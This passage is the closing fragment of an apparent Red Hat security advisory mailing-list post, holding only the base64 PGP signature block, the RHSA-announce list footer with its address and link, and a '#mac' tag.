InGscpQWdAJN+jtRz8IpJLpR6YYJ79/3lMHkCZQ05zcFG0yEv2VBTTpffOpjuAg5  
kD2KVwbT7TR7Pfbj2chQ9rZW2yppBuYgXq6l5Ssma+HoHkgzi+dj+E6GtZyptJX+  
7704STpEYHVRnooatp+eYpTkHwXdelQMZsD4PmjTWCEqC5UuuHUNMQ01lsnsY/IK  
mUwUgIwG0Lp7qSGunzS39kQqmE/KFVZ+BCjinx00OidBuSM6Q2NNYxjlvljBdptt  
kkhHcgYNCkD1Jbm2rM8Iz9tdLsW/+pru4gQ40FT0ZeW2FRD1cCinkV9k3301VSEh  
MO9ocRTzrqEaVbKkpZy8c4wKNA049YnfoMvUSeasVpgOwhJbsuZzd6BVx2jcQkoQ  
kSYv/JpHVn3p9vuqyUnmH3ANGrKSqsphDs3Z5sXykoMrcTHX5Va0913Im+dtHWw2  
nHNBH82IGcSjtTB6ZnmYF1c7c7DEGTmodvwsktI4Q3K/kCE18W7QYJi66T+GZJGq  
zGvn1xaKaazPpNfh2RDRq3w86v6MzpUWuEqDz7ZAVr1+AKaCLI8odGsQslajsjMJ  
7yYr7+mVO9zmtqxzword  
=0vpr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#mac